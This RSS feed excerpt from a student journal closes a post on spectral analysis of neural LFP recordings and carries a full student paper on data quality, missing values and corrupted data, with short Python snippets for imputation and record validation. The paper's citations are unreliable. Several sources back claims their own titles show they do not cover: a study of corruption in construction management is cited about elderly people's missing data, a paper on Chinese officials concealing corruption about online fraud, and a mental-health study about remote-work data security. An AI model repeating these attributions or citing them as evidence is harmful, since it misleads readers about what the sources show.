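<p>Indices are 0-based, so (0, 2) corresponds to electrodes 1 and 3 and (0, 1) to electrodes 1 and 2. Taking the absolute value treats a strong negative correlation as a strong relationship too; dropping <code>abs</code> would rank pairs by signed correlation instead.</p>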



<p>Fig. 18 plots against time the LFP signals from electrodes 1 and 2, which show low correlation in Fig. 17. This lets us check how similar the two signals actually are.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-34-1024x596.png" alt="" class="wp-image-1230" width="541" height="314" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-1024x596.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-300x175.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-768x447.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-920x535.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-230x134.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-350x204.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34-480x279.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-34.png 1447w" sizes="(max-width: 541px) 100vw, 541px" /><figcaption><br>Fig.18: LFP data from electrode 1 and electrode 2</figcaption></figure></div>



<p>As Fig. 18 shows, these signals are not very similar, which is consistent with the very small correlation for these two electrodes in the correlation matrix.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-35-1024x595.png" alt="" class="wp-image-1231" width="526" height="305" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-1024x595.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-300x174.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-768x446.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-920x535.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-230x134.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-350x203.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35-480x279.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-35.png 1449w" sizes="(max-width: 526px) 100vw, 526px" /><figcaption><br>Fig.19: LFP data from electrode 1 and 3</figcaption></figure></div>



<p>Fig. 19 shows data from electrodes 1 and 3, which are much more similar than the signals in Fig. 18: the peaks and dips of the signal from electrode 1 are consistent with those of electrode 3. This suggests that the brain regions where these electrodes were placed may be connected, or may work in coordination when subjected to certain tasks. Consistent with this, these two electrodes have a higher correlation, as the correlation plot in Fig. 17 shows.</p>



<h2 class="wp-block-heading">4. Coding</h2>



<p>All the graphs and plots in this paper were produced in Python. The code for each figure is available at the link below:</p>



<p><a href="https://github.com/giti21/Neural-Data-Analysis">https://github.com/giti21/Neural-Data-Analysis</a></p>






<h2 class="wp-block-heading">5. References</h2>



<p>Mentor: Dr. Gino Del Ferraro, NYU</p>



<ol class="wp-block-list"><li>Time Series &#8211; Stoica, P. and Moses, R. (2004). <em>Spectral Analysis of Signals</em>. Prentice Hall; <a href="https://en.wikipedia.org/wiki/Time_series">Wikipedia</a></li><li>Frequency vs. Time Domain &#8211; <a href="https://en.wikipedia.org/wiki/Frequency_domain">Wikipedia</a></li><li>Fourier Transform &#8211; <a href="https://en.wikipedia.org/wiki/Fourier_transform">Wikipedia</a>; <a href="https://www.youtube.com/watch?v=g1_wcbGUcDY">STFT</a></li><li>Power Spectral Density &#8211; Stoica, P. and Moses, R. (2004). <em>Spectral Analysis of Signals</em>. Prentice Hall.</li><li>Spectrogram &#8211; <a href="https://en.wikipedia.org/wiki/Spectrogram">Wikipedia</a>; <a href="https://pythonnumericalmethods.berkeley.edu/notebooks/chapter24.02-Discrete-Fourier-Transform.html">Spectrogram code</a></li><li>Correlation &#8211; <a href="https://en.wikipedia.org/wiki/Correlation">Wikipedia</a>; <a href="https://likegeeks.com/python-correlation-matrix/">Tutorial</a>; <a href="https://en.wikipedia.org/wiki/Covariance">Covariance</a>; <a href="https://en.wikipedia.org/wiki/Pearson_correlation_coefficient">Pearson Correlation</a></li><li>Local Field Potential &#8211; <a href="http://www.scholarpedia.org/article/Local_field_potential">LFP</a></li></ol>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Gitika Tirumishi Jada</h5><p>Gitika is a college senior studying electronics. She recently developed an interest in data science and its applications in medicine.
</p></figure></div>
<p>The post <a href="https://exploratiojournal.com/neural-data-analysis-using-spectral-techniques/">Neural Data Analysis Using Spectral Techniques</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Data Quality Analysis Relating to Missing and Corrupted Data</title>
		<link>https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=data-quality-analysis-relating-to-missing-and-corrupted-data</link>
		
		<dc:creator><![CDATA[Varshini Siddavatam]]></dc:creator>
		<pubDate>Sun, 22 Aug 2021 14:52:10 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[computer science]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[data trends]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1008</guid>

					<description><![CDATA[<p>Varshini Siddavatam<br />
Sri Chaitanya Junior College</p>
<div class="date">
August 1, 2021
</div>
<p>The post <a href="https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/">Data Quality Analysis Relating to Missing and Corrupted Data</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Varshini Siddavatam<br></strong><em>Sri Chaitanya Junior College</em><br>August 1, 2021</p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>This paper investigates the impact of missing values on commonly encountered data analysis problems. Identifying patterns in socio-demographic longitudinal data more effectively is critical in a wide range of social science settings, including academia. Because such data are categorical and multidimensional, and are contaminated by missing and inconsistent values, fundamental analytical operations such as clustering (grouping data by similarity) are difficult to perform. Inaccurate data can also cause companies significant financial losses. Poor-quality data is frequently cited as the root cause of operational failures, inaccurate analytics and poorly thought-out business strategies. Examples of the economic harm that data quality problems can cause include the extra cost of shipping products to the wrong customer addresses, sales opportunities lost because of inaccurate or incomplete customer records, and fines for failing to meet financial or regulatory reporting requirements. Data cleansing, also known as data scrubbing, corrects data errors and enhances data sets by adding missing values, more up-to-date information or additional records. The results are then monitored and measured against performance objectives, and any remaining data quality deficiencies become the starting point for the next round of planned improvements. The goal of this cycle is to ensure that efforts to improve overall data quality continue after individual projects are finished.</p>



<h2 class="wp-block-heading">I. Introduction</h2>



<h4 class="wp-block-heading">A. Background Information</h4>



<p>Data quality is a measure of the condition of data based on several factors, such as consistency, accuracy, reliability, completeness and timeliness (whether the data is up to date). Data professionals have to deal with missing and corrupted data in their regular work. To make data more dependable and flexible, it is important to assess data quality and identify data errors. Missing data refers to values that are absent from a record, much like missing entries in an important document. When informative data is missing, the record provides no information for the criteria that depend on it.</p>



<p>Especially in the last decade, with the constant growth of online data storage, the problem of corrupted data has grown rapidly. People now share a great deal of personal information on social networking and other online sites, and most work processes depend on online networks. The reported rate of missing data is 15% to 20% (nih.gov, 2021). It is therefore very important to maintain the quality of data.</p>



<h4 class="wp-block-heading">B. Thesis Statement</h4>



<p>This study focuses on the importance of analyzing data quality in relation to missing and corrupted data. The thesis of the research is that missing and corrupted data can be handled through effective solutions that improve the quality of data overall. In addition, improving the storage capacity of the data collection process can protect valuable data from being corrupted or lost.</p>



<p>With better knowledge and skills, data protection processes can be used far more effectively to secure the important documents uploaded to various online sites. Maintaining good-quality data that is hard to imitate or steal can also help prevent data corruption. Studies of missing data further suggest that cases of missing data have increased considerably worldwide. If prevention efforts receive proper government support, they will also be better understood by the public.</p>



<h2 class="wp-block-heading">II. Body</h2>



<h4 class="wp-block-heading">A. Support Paragraph 1</h4>



<p>Being unable to handle missing and corrupted data can have a negative effect on an individual's work process.</p>



<p>To handle missing data, operators can calculate a representative value for the column, such as its mean, and insert it into the empty cell. As opined by Hao <em>et al.</em> (2018), protecting systems against sudden power outages can prevent data from being corrupted. System crashes are another frequent cause of data loss. As stated by Gudivada <em>et al.</em> (2017), when a PC hard disk fills up with junk files, the risk of data corruption increases. Restoring previous versions of files from storage can help recover from data corruption, and updating the computer's operating system on a daily basis helps operators protect their important data. As observed by Azeroual &amp; Schöpfel (2019), administrators and developers can use the DISM (Deployment Image Servicing and Management) tool to modify and repair Windows system images. For recovering corrupted files, disk-checking commands are another key tool that can help restore lost data.</p>
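<p>Filling an empty cell with a value computed from the rest of its column is known as imputation. The sketch below assumes the value is the column mean (the median or the most frequent value are common alternatives) and uses NumPy's <code>np.nanmean</code>; the function name and the <code>ages</code> data are hypothetical.</p>

```python
import numpy as np

def impute_column_mean(column):
    """Replace NaN entries with the mean of the non-missing values in the column."""
    col = np.asarray(column, dtype=float)
    filled = col.copy()
    filled[np.isnan(col)] = np.nanmean(col)   # mean ignores the NaN entries
    return filled

ages = [23.0, np.nan, 31.0, 27.0, np.nan]
print(impute_column_mean(ages))   # [23. 27. 31. 27. 27.]
```

<p>Mean imputation keeps every row usable, but it shrinks the spread of the column because all filled cells receive the same value, so it works best when only a small share of the values is missing.</p>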



<p>According to reports, internet-based stock frauds earn millions every year. Most missing data cannot be recovered. As stated by Owusu <em>et al.</em> (2019), missing data is a particular concern for elderly people, who often have very little knowledge of technology and online procedures. Since most work is now done through online networking sites, keeping valuable data out of the hands of hackers is a real challenge. Elderly people are easily manipulated by fraudulent phishing calls into sharing their personal details, and hackers equipped with advanced technology continue to access other people's important data with ease. Any valuable data that is hacked, lost or corrupted can be used for criminal activities of any kind.</p>



<p>Securing these activities requires a proper approach to data protection. Missing or corrupted data not only disrupts work within an organization but can also harm individuals whose personal information is involved. As proposed by Morganstein &amp; Ursano (2020), remote working creates difficulties for employees responsible for data security, and this has been identified as a major issue for data corruption. In many cases, employees lack the knowledge and skills needed to keep data from going missing. Data always remains important as evidence from the earliest stage. Missing-data methods do not simply fill in a missing value; they combine the information available in the observed data with explicit assumptions.</p>



<p>Missing vital data or information also affects the research process and creates obstacles for researchers. Most cases of missing data are found in the corporate and private sectors, where almost all work is carried out through internet-based networks. As per the view of Pan &amp; Chen (2018), online platforms give fraudsters and hackers new opportunities to commit offences. Not all staff in a company are able to handle data security processes, so when data goes missing they face many problems in their work. This prevents work from running smoothly and can erode trust.</p>



<p>By adopting suitable strategic plans, administrators and developers in computer science can recover missing and corrupted data. Acquiring proper knowledge and skills in data protection can also reduce the effect of missing data. Corrupted data not only affects work in the corporate world but also damages customer trust. Today, a lack of knowledge about data security can cause serious problems, especially in the workplace.</p>



<h4 class="wp-block-heading">B. Support Paragraph 2</h4>



<p>Managing data quality analysis well makes it possible to recover missing and corrupted data, which has a positive effect on an individual's work process.</p>



<p>Because poor-quality data often limits the work process, it is important to adopt data quality analysis to protect work performance. As stated by Wahyudi <em>et al.</em> (2018), developers can maintain the quality of data to make operating systems more effective. As per the view of Uthayakumar <em>et al.</em> (2018), high-quality databases support data migration in an individual work process. In this context, planning and implementing a data recovery warehouse can meet the needs of the workplace. As opined by Cappiello <em>et al.</em> (2018), awareness of quality management helps make work processes effective. Consistently using good-quality data improves decision-making and makes the work more reliable.</p>



<p>In any work procedure, the data collection method and the collected data are equally important and play a vital role in the entire process. Protecting data requires the skill to handle information properly and place it in secure storage. As opined by Triguero <em>et al.</em> (2019), adopting an adequate data policy can also help protect valuable data in the long term. Most corruption and loss of data occurs while large data sets are being transferred. Because big data is heavy to load and slow to transfer, it requires a suitable framework to support the process. In addition, careful design of data storage can protect informative data more securely.</p>



<p>This approach especially helps employees working in corporate organizations. Holding data properly is an important workplace requirement, as it is linked to the success of the organization. According to Benzeval <em>et al.</em> (2020), work in any organization is based on data, which can be used to predict whether a profit is possible. Missing and corrupted data can occur unpredictably when a system becomes full and overloaded. In this situation, computer knowledge can prevent large losses and make them easier to handle. Good-quality databases can retain important data for long-term use. Therefore, regular data quality analysis can make the whole process more effective at protecting data from corruption.</p>



<p>The value of data can be preserved by adopting effective technologies that provide additional security so that data is not lost. However, data analysis must also be efficient enough to detect errors before they become risks. In the words of Broeders <em>et al.</em> (2017), focusing on data quality helps secure information and reduce risk. Given the current pace of change, it is crucial to develop new strategies and technologies in the workplace that bring innovation while maintaining data quality. Understanding the requirements of data analysis can also help in designing a proper strategy for managing corrupted data.</p>



<p>High-quality data can reduce a lack of trust and provide reliable resources for completing any piece of work. Since work in an organization is carried out on the basis of data analysis, and since transforming or transferring large volumes of data is where corruption and missing values tend to arise, advanced and modern security systems are needed to handle big data and protect it from corruption. To meet all the criteria discussed above, it is essential to follow a proper data analysis method so that potential risk factors can be identified and flagged for correction.</p>
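<p>Flagging risk factors so that they can be fixed can be made concrete with simple validation rules. The following Python sketch assumes each record is a dictionary and reports which rules each record fails; the rule names, the age threshold, and the sample data are hypothetical and for illustration only.</p>

```python
def flag_invalid_records(records, rules):
    """Return (index, failed_rule_names) for every record that breaks a rule.

    `rules` maps a rule name to a predicate that takes one record and returns
    True when the record passes. Records that pass every rule are omitted.
    """
    flagged = []
    for index, record in enumerate(records):
        failed = [name for name, check in rules.items() if not check(record)]
        if failed:
            flagged.append((index, failed))
    return flagged


# Hypothetical rules for a small table of survey responses.
RULES = {
    "age_present": lambda r: r.get("age") is not None,
    # A missing age is already reported by "age_present", so it passes here.
    "age_plausible": lambda r: r.get("age") is None or 0 <= r["age"] <= 120,
    "income_numeric": lambda r: isinstance(r.get("income"), (int, float)),
}


if __name__ == "__main__":
    records = [
        {"id": 1, "age": 34, "income": 52000},
        {"id": 2, "age": 430, "income": 61000},  # likely a typing error
        {"id": 3, "age": None, "income": "n/a"},
    ]
    print(flag_invalid_records(records, RULES))
    # [(1, ['age_plausible']), (2, ['age_present', 'income_numeric'])]
```

<p>Keeping the rules in a plain dictionary makes it easy to add or remove checks without changing the flagging function itself.</p>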



<h2 class="wp-block-heading">III. Conclusion</h2>



<p>Assessing data quality shows whether a work process is likely to be beneficial. The data analysis method as a whole needs to be more proactive in recovering missing and corrupted data. Maintaining proper rules and regulations can also help keep data collection methods to a high standard and so avoid data errors. As technology advances, hackers continue to find easy ways to steal other people's important data. To guard against all such offences, organizations need to adopt more effective and active data security systems that protect data over the long term. In many cases, a lack of proper knowledge about data security leads to serious problems, especially within working systems. Maintaining good-quality data that is difficult to copy or steal also helps prevent data corruption. In addition, computer knowledge can prevent large losses and make the problem easier to handle.</p>
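<p>Recovering missing values is often done by imputation. Triguero <em>et al.</em> (2019) discuss the k-nearest neighbours algorithm as a route to quality data; the Python sketch below is only a minimal, generic k-NN imputation under stated assumptions (numeric rows, <code>None</code> marking a missing value, and only complete rows used as neighbours), not the method described in that paper. The function name and sample values are hypothetical.</p>

```python
import math


def knn_impute(rows, k=2):
    """Fill None entries in numeric rows from the k nearest complete rows.

    Distance is Euclidean over the columns observed in the incomplete row,
    and each missing value becomes the mean of that column among the
    k neighbours. Only fully complete rows serve as neighbours (a
    simplifying assumption).
    """
    donors = [row for row in rows if None not in row]
    result = []
    for row in rows:
        if None not in row:
            result.append(list(row))
            continue
        if not donors:
            raise ValueError("no complete rows available as neighbours")
        observed = [i for i, value in enumerate(row) if value is not None]
        # Rank complete rows by distance on the columns this row actually has.
        neighbours = sorted(
            donors,
            key=lambda donor: math.dist(
                [row[i] for i in observed], [donor[i] for i in observed]
            ),
        )[:k]
        result.append([
            value if value is not None
            else sum(n[i] for n in neighbours) / len(neighbours)
            for i, value in enumerate(row)
        ])
    return result


if __name__ == "__main__":
    rows = [
        [1.0, 2.0, 3.0],
        [1.1, 2.1, 3.2],
        [9.0, 9.0, 9.0],
        [1.05, 2.05, None],
    ]
    for row in knn_impute(rows, k=2):
        print(row)
```

<p>Imputed values are estimates rather than recovered originals, so it is usually wise to record which entries were filled in.</p>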



<p>Based on the entire study, it can be concluded that monitoring the results of improvement efforts helps manage data quality. High-quality data is always helpful because work needs to rest on good, valid information rather than on inaccurate data. With better knowledge and skills, data protection processes can be used far more effectively to secure the important documents that are uploaded to various online sites. Because data drives the work process in any organization, a proper framework for analyzing the collected data is needed so that potential risks or errors are identified and prevented at a very early stage.</p>



<h2 class="wp-block-heading">Reference List</h2>



<p>Azeroual, O., &amp; Schöpfel, J. (2019). Quality issues of CRIS data: An exploratory investigation with universities from twelve countries. <em>Publications</em>, <em>7</em>(1), 14. Retrieved from https://www.mdpi.com/416282</p>



<p>Benzeval, M., Bollinger, C., Burton, J., Couper, M. P., Crossley, T. F., &amp; Jäckle, A. (2020). Integrated data: Research potential and data quality. <em>Understanding Society Working Paper Series</em>, (2020-02). Retrieved from https://www.understandingsociety.ac.uk/sites/default/files/downloads/working-papers/2020-02.pdf</p>



<p>Broeders, D., Schrijvers, E., van der Sloot, B., van Brakel, R., de Hoog, J., &amp; Ballin, E. H. (2017). Big Data and security policies: Towards a framework for regulating the phases of analytics and use of Big Data. <em>Computer Law &amp; Security Review</em>, <em>33</em>(3), 309-323. Retrieved from https://www.sciencedirect.com/science/article/pii/S0267364917300675</p>



<p>Cappiello, C., Samá, W., &amp; Vitali, M. (2018, June). Quality awareness for a successful big data exploitation. In <em>Proceedings of the 22nd International Database Engineering &amp; Applications Symposium</em> (pp. 37-44). Retrieved from https://dl.acm.org/doi/abs/10.1145/3216122.3216124</p>



<p>Gudivada, V., Apon, A., &amp; Ding, J. (2017). Data quality considerations for big data and machine learning: Going beyond data cleaning and transformations. <em>International Journal on Advances in Software</em>, <em>10</em>(1), 1-20. Retrieved from https://www.researchgate.net/profile/Junhua-Ding/publication/318432363_Data_Quality_Considerations_for_Big_Data_and_Machine_Learning_Going_Beyond_Data_Cleaning_and_Transformations/links/59ded28b0f7e9bcfab244bdf/Data-Quality-Considerations-for-Big-Data-and-Machine-Learning-Going-Beyond-Data-Cleaning-and-Transformations.pdf</p>



<p>Hao, Y., Wang, M., Chow, J. H., Farantatos, E., &amp; Patel, M. (2018). Modelless data quality improvement of streaming synchrophasor measurements by exploiting the low-rank Hankel structure. <em>IEEE Transactions on Power Systems</em>, <em>33</em>(6), 6966-6977. Retrieved from https://ieeexplore.ieee.org/abstract/document/8395403/</p>



<p>Morganstein, J. C., &amp; Ursano, R. J. (2020). Ecological disasters and mental health: Causes, consequences, and interventions. <em>Frontiers in Psychiatry</em>, <em>11</em>, 1. Retrieved from https://www.frontiersin.org/articles/10.3389/fpsyt.2020.00001/full</p>



<p>nih.gov. (2021). <em>The prevention and handling of the missing data</em> [Online]. Retrieved from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3668100/ [Accessed 27 July 2021]</p>



<p>Owusu, E. K., Chan, A. P., &amp; Shan, M. (2019). Causal factors of corruption in construction project management: An overview. <em>Science and Engineering Ethics</em>, <em>25</em>(1), 1-31. Retrieved from https://link.springer.com/content/pdf/10.1007/s11948-017-0002-4.pdf</p>



<p>Pan, J., &amp; Chen, K. (2018). Concealing corruption: How Chinese officials distort upward reporting of online grievances. <em>American Political Science Review</em>, <em>112</em>(3), 602-620. Retrieved from https://www.cambridge.org/core/journals/american-political-science-review/article/concealing-corruption-how-chinese-officials-distort-upward-reporting-of-online-grievances/43D20A0E5F63498BB730537B7012E47B</p>



<p>Triguero, I., García‐Gil, D., Maillo, J., Luengo, J., García, S., &amp; Herrera, F. (2019). Transforming big data into smart data: An insight on the use of the k‐nearest neighbors algorithm to obtain quality data. <em>Wiley Interdisciplinary Reviews: Data Mining and Knowledge Discovery</em>, <em>9</em>(2), e1289. Retrieved from https://wires.onlinelibrary.wiley.com/doi/abs/10.1002/widm.1289</p>



<p>Uthayakumar, J., Vengattaraman, T., &amp; Dhavachelvan, P. (2018). A survey on data compression techniques: From the perspective of data quality, coding schemes, data type and applications. <em>Journal of King Saud University-Computer and Information Sciences</em>. Retrieved from https://www.sciencedirect.com/science/article/pii/S1319157818301101</p>



<p>Wahyudi, A., Kuk, G., &amp; Janssen, M. (2018). A process pattern model for tackling and improving big data quality. <em>Information Systems Frontiers</em>, <em>20</em>(3), 457-469. Retrieved from https://link.springer.com/article/10.1007/s10796-017-9822-7</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Varshini Siddavatam</h5>
<p class="no_indent" style="margin:0;">Varshini is a senior at the Sri Chaitanya Junior College. Always interested in coding and data, she hopes to pursue computer science for her undergraduate major. Apart from academics, she is also interested in basketball, painting, dancing, and writing.</p></figure></div>
<p>The post <a href="https://exploratiojournal.com/data-quality-analysis-relating-to-missing-and-corrupted-data/">Data Quality Analysis Relating to Missing and Corrupted Data</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
